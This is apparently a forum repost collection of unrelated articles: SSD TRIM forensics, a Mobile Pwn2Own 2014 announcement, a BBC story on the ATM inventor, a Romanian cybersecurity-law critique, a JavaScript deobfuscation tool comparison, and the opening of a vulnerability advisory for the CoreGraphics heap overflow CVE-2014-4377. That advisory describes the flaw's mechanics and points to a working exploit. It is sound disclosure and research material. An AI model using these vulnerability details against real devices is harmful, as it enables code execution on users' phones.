approach, when enabled, only works for the FAT file system since it’s a published spec. (http:/www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChristiansen_ATA_TrimDeleteNotification_Windows7.pdf) External drives, USB enclosures and NAS The TRIM command is fully supported over the SATA interface, including the eSATA extension, as well as SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure or installed in most models of NAS devices, the TRIM command will not be communicated via the unsupported interface. [TABLE] [TR] [TD] [TABLE] [TR] [TD]YES[/TD] [/TR] [/TABLE] [/TD] [TD] [TABLE] [TR] [TD]NO[/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] There is a notable exception. Some NAS manufacturers start recognizing the demand for units with ultra-high performance, low power consumption and noise free operation provided by SSD drives, slowly adopting TRIM in some of their models. At the time of this writing, of all manufacturers only Synology appears to support TRIM in a few select models of NAS devices and SSD drives. Here is a quote from Synology Web site (https:/www.synology.com/en-uk/support/faq/591): SSD TRIM improves the read and write performance of volumes created on SSDs, increasing efficiency as well as extending the lifetime of your SSDs. See the list below for verified SSD with TRIM support. · You may customize a schedule to choose when the system will perform TRIM. · SSD TRIM is not available when an SHA cluster exists. · TRIM cannot be enabled on iSCSI LUN. · The TRIM feature under RAID 5 and 6 configurations can only be enabled on the SSDs with DZAT (Deterministic Read Zero after TRIM) support. Please contact your SSD manufacturers for details on DZAT support. PCI-Express and PCIe SSDs Interestingly, the TRIM command is not natively supported by any version of Windows for many high-performance SSD drives occupying the PCI Express slot. Do not confuse PCI Express SSD’s with SATA drives carrying M.2 or mSATA interfaces. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g., Intel SSD Optimizer, a part of Intel SSD Toolbox). RAID The TRIM command is not yet supported over RAID configurations (with few rare exceptions). SSD drives working as part of a RAID array can be analyzed. A notable exception from this rule would be the modern RAID 0 setup using a compatible chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied with the correct drivers (the latest RST driver from Intel allegedly works) and a recent version of BIOS. In these configurations, TRIM can be enabled. Corrupted Data Surprisingly, SSD drives with corrupted system areas (damaged partition tables, skewed file systems, etc.) are easier to recover than healthy ones. The TRIM command is not issued over corrupted areas because files are not properly deleted. They simply become invisible or inaccessible to the operating systems. Many commercially available data recovery tools (e.g., Intel® Solid-State Drive Toolbox with Intel® SSD Optimizer, OCZ SSD Toolbox) can reliably extract information from logically corrupted SSD drives. Bugs in SSD Firmware Firmware used in SSD drives may contain bugs, often affecting the TRIM functionality and/or messing up garbage collection. Just to show an example, OCZ Agility 3 120 GB shipped with buggy firmware v. 2.09, in which TRIM did not work. Firmware v. 2.15 fixed TRIM behavior, while v. 2.22 introduced issues with data loss on wake-up after sleep, then firmware v. 2.25 fixed that but disrupted TRIM operation again (information taken from http:/www.overclock.net/t/1330730/ocz-firmware-2-25-trim-doesnt-work-bug-regression-bad-ocz-experience). A particular SSD drive may or may not be recoverable depending on which bugs were present in its firmware. Bugs in SSD Over-Provisioning SSD over-provisioning is one of the many wear-leveling mechanisms intended for increasing SSD life span. Some areas on the disk are reserved on the controller level, meaning that a 120 GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called over-provisioning area (OP area), and can be used by SSD controllers when a fresh block is required for a write operation. A dirty block will then enter the OP pool, and will be erased by the garbage collection mechanism during the drive’s idle time. Speaking of SSD over-provisioning, firmware bugs can affect TRIM behavior in other ways, for example, revealing trimmed data after a reboot/power off. Solid-state drives are remapping constantly after TRIM to allocate addresses out of the OP pool. As a result, the SSD reports a trimmed data block as writeable (already erased) immediately after TRIM. Obviously, the drive did not have the time to actually clean old data from that block. Instead, it simply maps a physical block from the OP pool to the address referred to by the trimmed logical block. What happens to the data stored in the old block? For a while, it contains the original data (in many cases it’s compressed data, depending on the SSD controller). However, as that data block is mapped out of the addressable logical space, the original data is no longer accessible or addressable. Sounds complex? You bet. That’s why even seasoned SSD manufacturers may not get it right at the first try. Issues like this can cause problems when, after deleting data and rebooting the PC, some users would see the old data back as if it was never deleted. Apparently, because of the mapping issue the new pointers would not work as they should, due to a bug in the drive’s firmware. OCZ released a firmware fix to correct this behavior, but similar (or other) bugs may still affect other drives. SSD Shadiness: Manufacturers Bait-and-Switch When choosing an SSD drive, customers tend to read online reviews. Normally, when the new drive gets released, it is getting reviewed by various sources soon after it becomes available. The reviews get published, and customers often base their choice on them. But what if a manufacturer silently changes the drive’s specs without changing the model number? In this case, an SSD drive that used to have great reviews suddenly becomes much less attractive. This is exactly what happened with some manufacturers. According to ExtremeTech (http:/www.extremetech.com/extreme/184253-ssd-shadiness-kingston-and-pny-caught-bait-and-switching-cheaper-components-after-good-reviews), two well-known SSD manufacturers, Kingston and PNY, were caught bait-and-switching cheaper components after getting the good reviews. In this case, the two manufacturers were launching their SSDs with one hardware specification, and then quietly changed the hardware configuration after reviews have gone out. So what’s in there for us? Well, the forensic-friendly SandForce controller was found in the second revision of PNY Optima drives. Instead of the original Silicon Motion controller, the new batch of PNY Optima drives had a different, SandForce-based controller known for its less-than-perfect implementation of garbage collection leaving data on the disk for a long time after it’s been deleted. Small Files: Slack Space Remnants of deleted evidence can be acquired from so-called slack space as well as from MFT attributes. In the word of SSD, the term “slack space” receives a new meaning. Rather than being a matter of file and cluster size alignment, “slack space” in SSD drives deals with the different sizes of minimum writeable and minimum erasable blocks on a physical level. Micron, the manufacturer of NAND chips used in many SSD drives, published a comprehensive article on SSD structure: https:/www.micron.com/~/media/Documents/Products/Technical%20Marketing%20Brief/ssd_effect_data_placement_writes_tech_brief.pdf In SSD terms, Page is the smallest unit of storage that can be written to. The typical page size of today’s SSD is 4 KB or 8 KB. Block, on the other hand, is the smallest unit of storage that can be erased. Depending on the design of a particular SSD drive, a single block may contain 128 to 256 pages. As a result, if a file is deleted and its size is less than the size of a single SSD data block, OR if a particular SSD data block contain pages that still remain allocated, that particular block is NOT erased by the garbage collection algorithm. In practical terms, this means that files or file fragments (chunks) sized less than 512 KB or less than 2 MB depending on SSD model, may not be affected by the TRIM command, and may still be forensically recoverable. However, the implementation of the Deterministic Read After Trim (DRAT) protocol by many recent SSD drives makes trimmed pages inaccessible via standard SATA commands. If a particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual data may physically reside on the drive for a long time, yet it will be unavailable to forensic specialists via standard acquisition techniques. Sending the SSD drive to the manufacturer might be the only way of obtaining this information on a physical level. Small Files: MFT Attributes Most hard drives used in Windows systems are using NTFS as their file system. NTFS stores information about the files and directories in the Master File Table (MFT). MFT contains information about all files and directories listed in the file system. In other words, each file or directory has at least one record in MFT. In terms of computer forensics, one particular feature of MFT is of great interest. Unique to NTFS is the ability to store small files directly in the file system. The entire content of a small file can be stored as an attribute inside an MFT record, greatly improving reading performance and decreasing wasted disk space (“slack” space), referenced in the previous chapter. As a result, small files being deleted are not going anywhere. Their entire content continues residing in the file system. The MFT records are not emptied, and are not affected by the TRIM command. This in turn allows investigators recovering such resident files by carving the file system. How small does a file have to be to fit inside an MFT record? Very small. The maximum size of a resident file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files for the purpose of digital forensics. Encrypted Volumes Somewhat counter-intuitively, information deleted from certain types of encrypted volumes (some configurations of BitLocker, TrueCrypt, PGP and other containers) may be easier to recover as it may not be affected by the TRIM command. Files deleted from such encrypted volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the user) if the investigator knows either the original password or binary decryption keys for the volume. Encrypted containers are a big topic, so we’ll cover it in a dedicated chapter. TRIM on encrypted volumes is a huge topic well worth a dedicated article or even a series of articles. With the large number of crypto containers floating around and all the different security considerations and available configuration options, determining whether TRIM was enabled on a particular encrypted volume is less than straightforward. Let’s try assembling a brief summary on some of the most popular encryption options. Apple FileVault 2 Introduced with Apple OS X “Lion”, FileVault 2 enables whole-disk encryption. More precisely, FileVault 2 enables whole-volume encryption only on HFS+ volumes (Encrypted HFS). Apple chose to enable TRIM with FileVault 2 volumes on drives. It has the expected security implication of free sectors/blocks being revealed. Microsoft BitLocker Microsoft has its own built-in version of volume-level encryption called BitLocker. Microsoft made the same choice as Apple, enabling TRIM on BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the TRIM command is only available on NTFS volumes. TrueCrypt TrueCrypt supports TRIM pass-through on encrypted volumes located on SSD drives. The company issued several security warnings in relation to wear-levelling security issues and the TRIM command revealing information about which blocks are in use and which are not. (http:/www.truecrypt.org/docs/trim-operation and http:/www.truecrypt.org/docs/wear-leveling) PGP Whole Disk Encryption By default, PGP whole-disk encryption does not enable TRIM on encrypted volumes. However, considering wear-leveling issues of SSD drives, Symantec introduced an option to enable TRIM on SSD volumes via a command line option: –fast (http:/www.symantec.com/connect/forums/pgp-and-ssd-wear-leveling). If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the entire content of a file representing the encrypted volume, which disables the effect of the TRIM command for the contents of the encrypted volume. More research is required to investigate these options. At this time one thing is clear: in many configurations, including default ones, files deleted from encrypted volumes will not be affected by the TRIM command. Which brings us to the question of the correct acquisition of PCs with encrypted volumes. Forensic Acquisition: The Right Way to Do The right way to acquire a PC with a crypto container can be described with the following sentence: “If it’s running, don’t turn it off. If it’s off, don’t turn it on.” Indeed, the original decryption keys are cached in the computer’s memory, and can be extracted from a LiveRAM dump obtained from a running computer by performing a FireWire attack. These keys can be contained in page files and hibernation files. Tools such as Passware can extract decryption files from memory dumps and page/hibernation files, decrypting the content of encrypted volumes. Reality Steps In: Why Real SSDs are Often Recoverable In reality, things may look different from what was just described above in such great technical detail. In our lab, we’ve seen hundreds of SSD drives acquired from a variety of computers. Surprisingly, Belkasoft Evidence Center was able to successfully carve deleted data from the majority of SSD drives taken from inexpensive laptops and sub-notebooks such as ASUS Eee or ASUS Zenbook. Why is it so? There are several reasons, mainly “cost savings” and “miniaturization”, but sometimes it’s simply over-engineering. Inexpensive laptops often use flash-based storage, calling that an SSD in their marketing ploy. In fact, in most cases it’s just a slow, inexpensive and fairly small flash-based storage having nothing to do with real SSD drives. Ultrabooks and sub-notes have no space to fit a full-size SSD drive. They used to use SSD drives in PCIe form factor (as opposed to M.2 or mSATA) which did not support the SATA protocol. Even if these drives are compatible with the TRIM protocol, Windows does not support TRIM on non-ATA devices. As a result, TRIM is not enabled on these drives. SSD drives are extremely complex devices requiring extremely complex firmware to operate. Many SSD drives were released with buggy firmware effectively disabling the effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware to a working version, the original data may reside on an SSD drive for a long time. The fairly small (and inexpensive) SSD drives used in many entry-level notebooks lack support for DRAT/DZAT. As a result, deleted (and trimmed) data remain accessible for a long time, and can be successfully carved from a promptly captured disk image. On the other end of the spectrum are the very high-end, over-engineered devices. For example, Acer advertises its Aspire S7-392 as having a RAID 0 SSD. According to Acer marketing, “RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access your files and transfer photos and movies quicker than ever!” (http:/www.acer.com/aspires7/en_US/). This looks like over-engineering. As TRIM is not enabled on RAID SSD’s in any version of Windows, this ultra-fast non-conventional storage system may slow down drastically over time (which is exactly why TRIM was invented in the first place). For us, this means that any data deleted from these storage systems could remain there for at least as long as it would have remained on a traditional magnetic disk. Of course, the use of the right chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied with the correct drivers (the latest RST driver from Intel allegedly works) can in turn enable TRIM back. However, we are yet to see how this works in reality. (http:/www.anandtech.com/show/6477/trim-raid0-ssd-arrays-work-with-intel-6series-motherboards-too) Conclusion SSD forensics remains different. SSDs self-destroy court evidence, making it difficult to extract deleted files and destroyed information (e.g., from formatted disks) is close to impossible. Numerous exceptions still exist, allowing forensic specialists to access destroyed evidence on SSD drives used in certain configurations. There has been little progress in SSD development since the publication of our last article on SSD forensics in 2012. The factor defining the playing field remains delivering bigger size for less money. That aside, compressing SSD controllers appear to become the norm, making off-chip acquisition unpractical and killing all sorts of DIY SSD acquisition hardware. More SSD drives appear to follow the Deterministic Read After Trim (DRAT) approach defined in the SATA standard a long time ago. This in turn means that a quick format is likely to instantly render deleted evidence inaccessible to standard read operations, even if the drive is acquired with a forensic write-blocking imaging hardware immediately after. SSD drives are getting more complex, adding over-provisioning support and using compression for better performance and wear leveling. However, because of the increased complexity, even seasoned manufacturers released SSD drives with buggy firmware, causing improper operation of TRIM and garbage collection functionality. Considering just how complex today’s SSD drives have become, it’s surprising these things do work, even occasionally. The playfield is constantly changing, but what we know now about SSD forensics gives hope. About the authors Yuri Gubanovis a renowned computer forensics expert. He is a frequent speaker at industry-known conferences such as HTCIA, TechnoSecurity, CEIC and others. Yuri is the Founder and CEO of Belkasoft. Besides, Yuri is senior lecturer at St-Petersburg State University. You can add Yuri Gubanov to your LinkedIn network at Yuri Gubanov | LinkedIn Oleg Afonin is an expert and consultant in computer forensics. You can contact the authors via research@belkasoft.com About Belkasoft Research Belkasoft Research is based in St. Petersburg State University. The company performs non-commercial researches and scientific activities Sursa: Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions | Forensic Focus - Articles
-
Admin | September 4, 2014 HP Security Research’s Zero Day Initiative (ZDI) invites you to join us for the third annual Mobile Pwn2Own competition, to be held this year on November 12-13 at PacSec Applied Security Conference in Tokyo, Japan. We’re looking forward to rewarding the world’s top researchers for demonstrating and disclosing their stealthy attacks on mobile devices, and we’re delighted that our friends at Google’s Android Security Team and BlackBerry are joining us again as sponsors. This year, we’re upping the prize pool to $425,000, rearranging the prize package, and introducing new devices in order to attract the best and brightest researchers and enhance security for the most popular mobile platforms. In their sights – the mobile attack surface In case you’re not familiar, Mobile Pwn2Own is ZDI’s annual contest that rewards security researchers for highlighting security vulnerabilities on mobile platforms. (You may have heard of its sister contest for other platforms, Pwn2Own, which was held in March this year at CanSecWest.) With the near-ubiquity of mobile devices, vulnerabilities on these platforms are becoming increasingly coveted and are actively and vigorously hunted by criminals for exploitation. This contest helps to harden these devices by finding vulnerabilities first and sharing that research with mobile device and platform vendors. This year’s bounty The prize pool is rising again, with HP and its sponsors offering over $425,000 (USD) in cash and prizes to researchers who successfully compromise selected mobile targets from particular categories, which is $125,000 more than last year’s contest. Contestants are judged on their ability to uncover new vulnerabilities and to develop cutting-edge exploit techniques that can be used to compromise some of the world’s most popular mobile devices. Mobile Web Browser ($50,000) Mobile Application/Operating System ($50,000) Reachable by a remote attacker (including through browser) [*]Short Distance ($75,000), either: Bluetooth, or Wi-Fi, or Near Field Communication (NFC) [*]Messaging Services ($100,000), either: Short Message Service (SMS), or Multimedia Messaging Service (MMS), or Commercial Mobile Alert System (CMAS) [*]Baseband ($150,000) Limited to Apple iPhone, Google Nexus, BlackBerry Z30 Only Contestants can select the target they want to compromise during pre-registration. The details, including exact OS version, applications, firmware and model numbers will be coordinated after pre-registration. The following targets are available for selection: Amazon Fire Phone Apple iPhone 5s Apple iPad Mini with Retina Display BlackBerry Z30 Google Nexus 5 Google Nexus 7 Nokia Lumia 1520 Samsung Galaxy S5 How do I enter? The contest is open to all registrants in the PacSec 2014 conference (as long as you meet our rather inclusive eligibility requirements). Start by reviewing the contest rules, here. Next, if you don’t already have a free ZDI researcher account, you need to sign-up here. When you’re all signed up as a ZDI researcher, it’s simply a matter of contacting us to register for the contest. More importantly, how do I win? Be the first to compromise a selected target in one of the categories using a previously unknown vulnerability (one that has not been disclosed to the affected vendor). You’ve got 30 minutes to complete your attempt. When you’ve successfully demonstrated your exploit and ‘pwned’ the targeted device, you need to provide ZDI with a fully functioning exploit and a whitepaper detailing all of the vulnerabilities and techniques utilized in your attack. A successful attack against these devices must require no user interaction beyond the action required to browse to the malicious content. As always, the initial vulnerability used in the attack must be in the registered category. The contestant must demonstrate remote code execution by bypassing sandboxes (if applicable) and exfiltrating sensitive information. To avoid interfering with licensed carrier networks, all RF attacks must be completed within the provided RF isolation enclosure. The vulnerabilities utilized in the attack must be unpublished zero days. As always, ZDI reserves the right to determine what constitutes a successful attack. The vulnerabilities and exploit techniques discovered by the winning researchers will be disclosed to the affected vendors. If the affected vendor is at the conference, we can even arrange to hand over the vulnerability details onsite for the fastest possible remediation. If you missed it above, the full contest rules are here. Want to know more? We’ll be tweeting regular updates and news on Mobile Pwn2Own up to and during the contest. You can follow us @thezdion Twitter or search for the hash tag #pwn2own. Visit pwn2own.com for updates throughout the contest and to check out content from past contests, including photos, videos and more. For press inquiries, please contact Heather Goudey heather.goudey@hp.com Sursa: Mobile Pwn2Own Tokyo 2014 - PWN2OWN
-
The man who invented the cash machine [TABLE=width: 416] [TR] [TD] By Brian Milligan Business reporter, BBC News [/TD] [/TR] [/TABLE] "They're clever scoundrels," fumes John Shepherd-Barron at his remote farmhouse in northern Scotland. He is referring to the seals which are raiding his salmon farm and stealing fish. [TABLE=width: 208, align: right] [TR] [TD=width: 5][/TD] [TD=class: sibtbg] John Shepherd-Barron's cash machine first appeared in 1967 Inventor's memories [/TD] [/TR] [/TABLE] "I invented a device to scare them off by playing the sound of killer whales, but it's ended up only attracting them more." But failure with this device is in contrast to the success of his first and greatest invention: the cash machine. The world's first ATM was installed in a branch of Barclays in Enfield, north London, 40 years ago this week. Reg Varney, from the television series On the Buses, was the first to withdraw cash. Inspiration had struck Mr Shepherd-Barron, now 82, while he was in the bath. "It struck me there must be a way I could get my own money, anywhere in the world or the UK. I hit upon the idea of a chocolate bar dispenser, but replacing chocolate with cash." Barclays was convinced immediately. Over a pink gin, the then chief executive signed a hurried contract with Mr Shepherd-Barron, who at the time worked for the printing firm De La Rue. Teething troubles Plastic cards had not been invented, so Mr Shepherd-Barron's machine used cheques that were impregnated with carbon 14, a mildly radioactive substance. The machine detected it, then matched the cheque against a Pin number. [TABLE=width: 203, align: right] [TR] [TD] Reg Varney was the first to use an ATM [/TD] [/TR] [/TABLE] However, Mr Shepherd-Barron denies there were any health concerns: "I later worked out you would have to eat 136,000 such cheques for it to have any effect on you." The machine paid out a maximum of £10 a time. "But that was regarded then as quite enough for a wild weekend," he says. To start with, not everything went smoothly. The first machines were vandalised, and one that was installed in Zurich in Switzerland began to malfunction mysteriously. It was later discovered that the wires from two intersecting tramlines nearby were sparking and interfering with the mechanism. One by-product of inventing the first cash machine was the concept of the Pin number. Mr Shepherd-Barron came up with the idea when he realised that he could remember his six-figure army number. But he decided to check that with his wife, Caroline. "Over the kitchen table, she said she could only remember four figures, so because of her, four figures became the world standard," he laughs. End of cash? Customers using the cash machine at Barclays in Enfield High Street are mostly unaware of its historical significance. A small plaque was placed there on the 25th anniversary, but few people notice it. Given that there are now more than 1.6 million cash machines worldwide, it is a classic case of British understatement. [TABLE=width: 203, align: right] [TR] [TD] The plaque at the site of the first ATM goes unnoticed by many [/TD] [/TR] [/TABLE] Mr Shepherd-Barron says he and his wife realised the importance of his invention only when they visited Chiang Mai in northern Thailand. They watched a farmer arriving on a bullock cart, who removed his wide-brimmed hat to use the cash machine. "It was the first evidence to me that we'd changed the world," he says. But even though he invented the machine, Mr Shepherd-Barron believes its use in future will be very different. He predicts that our society will no longer be using cash within a few years. "Money costs money to transport. I am therefore predicting the demise of cash within three to five years." He believes fervently that we will soon be swiping our mobile phones at till points, even for small transactions. At 82, Mr Shepherd-Barron is very much alive to new ideas and inventions - even though his device that plays killer whale noises still needs a little bit of tinkering. Sursa: BBC NEWS | Business | The man who invented the cash machine
-
Legea securitatii cibernetice revine pe fast forward 23/09/14 14:27:00, by bogdan, 809 words Legea securitatii cibernetice revine pe fast forward Doar nu credeati ca o data cu decizia pe pre-pay, onor alesii nostrii si institutiile impingatoare de securism cibernetic au inteles ca textele de lege ar trebui dezbatute serios - mai ales cele care aduc atingere libertatilor fundamentale? Propunerea de lege prvind securitatea cibernetica a Romaniei n-a mai fos dezbatuta in Camera Deputatilor, ca a trecut prin adoptare tacita pe 17 Septembrie. De cum a fost trimisa la Senat, a primit termen de 2 (doua) zile (adica maine) pentru a primi raport de la Comisia de aparare (adica Comisia de fond). (desi NU este oficial in procedura de urgenta). Evident, comisia de drepturile omului nu a fost inclusa nici macar pentru aviz. Dupa cum v-am mai precizat deja, propunerea asta de lege este mult mai naspa decat cea cu pre-pay-ul care un mizilic. Sa va reamintesc cele mai interesante propuneri: Toate firmele (ca SRI zice ca utilizatori nu inseamna persoane fizice, eu zic ca inseamna - dar sa nu ne pierdem in detalii) trebuie sa “permita accesul la date” acestor autoritati (SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO si ANCOM). Accesul se face la simpla “solicitare motivata". Atentie mare - nu e vorba sa dai datele informatice pe care le ai si care ar putea sa ajute la vreo investigatie, ci “accesul la date", daca n-am fost prea subtil cu diferenta asta. Toate firmele care au un laptop, smartphone sau orice alt device trebuie sa adopte politici de securitate cibernetic?, ca si s? identifice ?i s? implementeze m?surile tehnice ?i organizatorice adecvate pentru a gestiona eficient riscurile de securitate. Asta inseamn? minim 1500 de euro/firma investi?i in securitate. (o sa vedeti ce chestii frumoase trebuie sa scrieti in politicile de securitate cibernetica…) In vreme ce UE ne cere ca aceste institu?ii care se ocupa de domeniul securit??ii cibernetice s? fie “organisme civile, care s? func?ioneze integral pe baza controlului democratic, ?i nu ar trebui s? desf??oare activit??i în domeniul informa?iilor", noi dam SRI-ul ca cea mai democratica, civila si apropriata de cetateni dintre institutii. Competenta tehnica o avea, dar sub control democratic nu este. Si nici nu cunoaste termeni precum dezbatere publica, acces la informatii publice sau transparenta decizionala. Dar va zic - nu va agitati prea mult! Oricum Senatul nu are timp sa dezbata, iar cele “18 victime/secunda (n.m - asta vine 1.5 mil de victime pe zi) ale Internetului” au nevoie de SRI sa le protejeze. Chiar daca ele nu vor. De asemenea, observatiile unora si amendamentele depuse nici macar nu sunt luate in considerare pentru este greu sa judeci cu mintea ta. Daca ne zice SRI ceva, atunci asa este cu siguranta. Iar argumentele de drepturile omului sau deciziile CCR nu sunt suficiente pentru nimeni - oricum Romania nu este o democratie. CCR a declat ca accesul la datele de trafic trebuie supus controlului unui judecator, dar cu siguranta va decide altfel daca datele accesate pot fi si date de continut (deci mai mult decat date de trafic). Solicit?rile de acces la datele re?inute în vederea utiliz?rii lor în scopul prev?zut de lege, formulate de c?tre organele de stat cu atribu?ii în domeniul securit??ii na?ionale, nu sunt supuse autoriz?rii sau aprob?rii instan?ei judec?tore?ti, lipsind astfel garan?ia unei protec?ii eficiente a datelor p?strate împotriva riscurilor de abuz precum ?i împotriva oric?rui acces ?i a oric?rei utiliz?ri ilicite a acestor date. Aceast? împrejurare este de natur? a constitui o ingerin?? în drepturile fundamentale la via?? intim?, familial? ?i privat? ?i a secretului coresponden?ei ?i, prin urmare, contravine dispozi?iilor constitu?ionale care consacr? ?i protejeaz? aceste drepturi. Am zis destule. Pentru o completare a imaginii generale cititi si articolul lui Dan Tapalaga - Tara Democratiei cu Epoleti. Iar unul dintre autorii de pe Contributors comenteaza sec situatia de detaliu mai bine decat v-as fi descris-o eu: Mai exist? de asemenea în România legi proaste, cu dispozi?ii neconstitu?ionale, adoptate de parlamentari ce fac exces de zel în cl?direa unor rela?ii de bun? vecin?tate cu alte institu?ii ale statului, precum ?i institu?ii ale statului ce fac exces de zel în criticarea Cur?ii Constitu?ionale pentru c? cenzureaz? excesele de prostie inten?ionat? ale Parlamentului. Toate acestea sub acoperirea unei ?arade legate de rezultate deosebite, îns? selective (mai nou chiar în sens activ-negativ), în lupta împotriva corup?iei, precum ?i sub acoperirea a de acum omniprezentei amenin??ri externe, în special cibernetice ?i în special din Orientul Mijlociu. Ar fi rizibil dac? nu ar fi trist pentru c? înainte s? fie albastru precaut a fost roz imaginat, mai ales înainte ca prietenoasa prim?var? ruseasc? s? î?i arate delicat ghioceii la Odessa. Într-un cuvânt, totul e bine în România, ?ara este sigur? ?i va fi bine protejat? cibernetic de ac?iuni de subversiune intern? realizate în for??, precum puciul parlamentar anticonstitu?ional din vara lui 2012, un maxim de stabilitate roz sub umbrela alian?ei ce e datoare s? apere România. Uneori chiar ?i de ea îns??i, nu-i a?a? ?i în continuare, în România, nimeni nu are absolut nicio problem?. Noapte buna! Sursa: Legea securitatii cibernetice revine pe fast forward Autor: Bogdan MANOLEA
-
Javascript Deobfuscation Tools Redux Posted on September 23, 2014 by darryl Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention. Here are the tools I’ll be testing: Automated JSUnpack Javascript Deobfuscator (Firefox Add-On) SpiderMonkey Semi-Automated/Manual JSDetox Javascript Debugger (all are similar; using Script Debugger for this test): Microsoft Script Debugger, Chrome Developer Tools, Firefox Developer Tools, Firebug (Firefox Add-On) Revelo Here are the obfuscated scripts: Sample 1 Dean Edwards Packer Sample 2 HiveLogic Enkoder Sample 3 For this sample, I used the same original HTML code as the above and obfuscated it using three online obfuscators in the following order: obfuscatorjavascript.com, www.gaijin.at/en/olsjse.php, www.atasoyweb.net/Javascript_Encrypter/javascript_encrypter_eng.php Sample 4 Speed-Trap JS Sample 5 Gong Da EK Sample 6 RIG EK Sample 7 Angler EK Sample 8 Nuclear EK Prelude My plan is simple. Use the tools to try to deobfuscate the above scripts without spending more than a few minutes on each one. If I can’t figure it out by making obvious tweaks along the way then I move on. To be honest, I’m no expert with all of these tools so I’m not taking full advantage of its capabilities but this should give you some idea of what you can expect. I would encourage you to play along (the scripts are here) . Be sure you do this in a virtual machine because many of the scripts are real and very malicious. JSUnpack JSUnpack is fully automated and can deal with a lot of scripts except the complex ones. Javascript Deobfuscator This Firefox add-on is quite robust and also completely automated. Interestingly, it is able to deobfuscate the hard ones but trips up on an easy one. This tool won’t be able to handle scripts that target Internet Explorer for obvious reasons. You might be able to comment out some browser sniffing routines though. SpiderMonkey The SpiderMonkey tool would be similar to using Rhino or V8 engines but Didier Stevens adds some mods that has beefed up SpiderMonkey’s capabilities. DOM-based scripts tend to pose a problem for these engines but you can make several tweaks to the script and define objects to get around this. JSDetox This tool has a lot of capability and potential. The main reason it can’t deob the malicious scripts is probably because I suck at using it. Javascript Debugger Pretty much all of the Javascript debuggers work the same way so I just lumped them together as a single class of tools. Using a debugger can be slow because you have to follow along with the script and know where to place breakpoints but it is often the most effective way of deobfuscating scripts. Revelo I would have hoped my own tool would do pretty well against these scripts and it did. The main challenge with using Revelo is that you need to understand the script you are working on and be able to recognize entry and exit points to inspect. This tool is definitely not for everyone but it has the capability to do just as well as a debugger. Conclusion and Scorecard As I mentioned earlier, I’m probably not making the most of every tool as they are quite capable and powerful in their own right. The end result is probably more of a reflection of my abilities rather than the tool so take this with a barrel of salt. Sursa: Javascript Deobfuscation Tools Redux | Kahu Security
-
CoreGraphics Memory Corruption - CVE-2014-4377 Apple CoreGraphics library fails to validate the input when parsing the colorspace specification of a PDF XObject resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input in any application linked with the affected framework. Using a crafted PDF file as an HTML image and combined with a information leakage vulnerability this issue leads to arbitrary code execution. A complete 100% reliable and portable exploit for MobileSafari on IOS7.1.x. can be downloaded from github Summary Title: Apple CoreGraphics Memory Corruption CVE Name: CVE-2014-4377 Permalink: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377 Date published: 2014-09-18 Date of last update: 2014-09-19 Class: Client side / Integer Overflow / Memory Corruption Advisory: HT6441 HT6443 Vulnerability Details Safari accepts PDF files as native image format for the < image > html tag. Thus browsing an html page in Safari can transparently load multiple pdf files without any further user interaction. CoreGraphics is the responsible of parsing the PDF files. Apple Core Graphics framework fails to validate the input when parsing the colorspace specification of a PDF XObject. A small heap memory allocation can be overflowed with controlled data from the input enabling arbitrary code execution in the context of Mobile Safari (A memory layout information leak is needed). The Core Graphics framework is a C-based API that is based on the Quartz advanced drawing engine. It provides low-level, lightweight 2D rendering. This is used in a wide range of applications to handle path-based drawing, transformations, color management, offscreen rendering, patterns, gradients and shadings, image data management, image creation, masking, and PDF document creation, display, and parsing. CoreGraphics library implements the functionality to load and save several graphic formats such as PDFs and it is used by most common applications that deal with images, including Safari, Preview, Skype, etc. The 32 bit version of the framework also implements the x_alloc heap, a set of low level procedures to manage an internal heap memory structure used when processing images of different types (including PDF files). The functions x_calloc and x_free are used very frequently to allocate and de-allocate memory fast. The x_calloc function behaves as a normal calloc except it allocates a bit extra memory for metadata. It actually allocates an extra 2*sizeof(void*) bytes and pad the resulting size to the next 16 byte border. When the chunk is in use (allocated) this extra space is used to hold the size of the chunk, thus making it super fast to free. On the other hand when the chunk is free the metadata space is used to form a free-list linked list, the first metadata value in a free chunk points to the next free chunk. This is its pseudocode. Think x_mem_alloc0_size as a plain malloc. void* __cdecl x_calloc(size_t nmemb, size_t size) { void * buffer = x_mem_alloc0_size((nmemb * size + 31) & -16); *(size_t *)buffer = (nmemb * size + 31) & -16; return buffer + 16; } This function is prone to integer overflow because it doesn’t check for (nmemb * size) to be less than MAXUINT-16. Then if a programmer tries to allocate a size in the range [-16,-1] x_alloc will allocate 0(zero) or 16 bytes (instead of the inmense value requiered) without triggering any exception. An x_calloc bug There is a x_calloc related bug in how PDF handles the colorspace for embedded XObjects. Forms and images of different types can be embedded in a PDF file using an XObject pdf stream. As described in the pdf specification, an XObject can specify the colorspace in which the intended image is described. The CoreGraphics library fails to validate the input when parsing the /Indexed colorspace definition of an XObject pdf stream and enables an attacker to reach x_calloc with a size in the [16,-1] range. The indexed colorspace definition is table based and relies on a base colorspace. For example, the following definition defines an indexed colorspace of 200 colors based on a RGB base colorspace with the table defined in the indirect object 8 0 R. For more info on indexed colorspaces see section 8.6.6.3 of the pdf specification. /ColorSpace [/indexed /DeviceRGB 200 8 0 R] The following is an excerpt of the function _cg_build_colorspace. It was taken from the dyld_shared_cache_armv7 of the iPhone3,1 (iPhone4) iOS version 7.1.1. The function can be disassembled at address 0x2D59F260 considering that the dyld_shared_cache is loaded at 0x2C000000. /* cs_index_array should represent something like this: [/indexed /DeviceRGB 200 8 0 R] */ /* 